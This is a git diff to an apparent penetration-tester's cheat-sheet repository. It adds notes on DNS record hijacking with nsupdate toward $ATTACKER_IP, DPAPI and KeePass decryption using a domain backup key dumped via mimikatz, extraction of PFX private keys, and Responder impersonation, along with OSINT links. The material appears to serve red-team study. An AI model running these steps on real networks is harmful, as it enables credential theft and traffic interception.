diff --git a/.gitmodules b/.gitmodules
index d6dc447..02bcfee 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -181,3 +181,6 @@
 [submodule "misc/level3_hypervisor/kubeletctl"]
 	path = misc/level3_hypervisor/kubeletctl
 	url = https://github.com/cyberark/kubeletctl.git
+[submodule "misc/bruteforce/patator"]
+	path = misc/bruteforce/patator
+	url = https://github.com/lanjelot/patator.git
diff --git a/enumeration/docs/dns.md b/enumeration/docs/dns.md
index ed0c86b..0ed7fde 100644
--- a/enumeration/docs/dns.md
+++ b/enumeration/docs/dns.md
@@ -9,3 +9,17 @@ drill   @$TARGET_DNS $DOMAIN axfr
 ```
 
 * [subrake](https://github.com/hash3liZer/Subrake.git)
+
+
+## Join a Domain
+
+* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk 
+```sh
+nsupdate
+server <DNS-IP>
+update delete <sub.domain.com>
+update add <sub.domain.com> 1234 A $ATTACKER_IP
+send
+quit
+```
+* Check domain by querying the subdomain's A record via dig/drill/nslookup
diff --git a/exploit/windows/docs/dpapi.md b/exploit/windows/docs/dpapi.md
new file mode 100644
index 0000000..8ea8716
--- /dev/null
+++ b/exploit/windows/docs/dpapi.md
@@ -0,0 +1,27 @@
+# DPAPI
+
+* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)
+* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)
+* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)
+* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)
+
+## Tools
+
+* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)
+* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)
+* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround
+Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
+    * Get the pvk backup key from the DC via mimikatz
+    * Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
+    * Get the encrypted blob
+    * Get the user's Masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
+    * Use dpapilab-ng's `keepassdec.py`
+```sh
+./keepassdec.py  --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk  --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin 
+```
+    * Use the decrypted blob to 
+```sh
+CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
+```
+* Open the `*.kdbx` file
+
diff --git a/hashes/hashcat_utils.md b/hashes/hashcat_utils.md
index 96f02cc..66becd2 100644
--- a/hashes/hashcat_utils.md
+++ b/hashes/hashcat_utils.md
@@ -4,3 +4,8 @@
 ```sh
 combinator wordlist.txt otherwordlist.txt > newwordlist.txt
 ```
+
+* Create wordlist
+```sh
+hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
+```
diff --git a/misc/bruteforce/patator b/misc/bruteforce/patator
new file mode 160000
index 0000000..4690822
--- /dev/null
+++ b/misc/bruteforce/patator
@@ -0,0 +1 @@
+Subproject commit 46908228cc85fbc032426a12d048fa372e213da4
diff --git a/misc/openssl/openssl.md b/misc/openssl/openssl.md
new file mode 100644
index 0000000..8970457
--- /dev/null
+++ b/misc/openssl/openssl.md
@@ -0,0 +1,17 @@
+# OpenSSL Cheatsheet
+
+## Extract keys from PFX Cert
+
+* Key and cert form PFX
+```sh
+openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
+openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
+```
+
+## Extract & Repack PFX Cert
+
+* Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
+```sh
+openssl pkcs12 -in *.pfx -out temp.pem -nodes
+openssl pkcs12 -export -out *.pfx -in temp.pem
+```
diff --git a/misc/responder.md b/misc/responder.md
new file mode 100644
index 0000000..ab4d130
--- /dev/null
+++ b/misc/responder.md
@@ -0,0 +1,21 @@
+# Responder
+
+## Impersonate Domain -- Change Responder's certificates
+
+* After using nsupdate to add the attacker as a subdomain do the following tasks
+* Add a certificate and its private key to
+```sh
+/usr/share/responder/certs
+```
+* Edit `Responder.conf`
+```
+[HTTPS Server]
+
+; Configure SSL Certificates to use
+SSLCert = certs/cert.pem
+SSLKey = certs/key.pem
+```
+* Start responder
+```sh
+responder -I <interface>
+```
diff --git a/osint/osint_links.txt b/osint/osint_links.txt
new file mode 100644
index 0000000..5a62e65
--- /dev/null
+++ b/osint/osint_links.txt
@@ -0,0 +1,9 @@
+https://urlscan.io/
+https://abuse.ch
+https://bazaar.abuse.ch/
+https://feodotracker.abuse.ch/
+https://sslbl.abuse.ch/
+https://urlhaus.abuse.ch/
+https://threatfox.abuse.ch/
+https://www.phishtool.com/
+https://talosintelligence.com/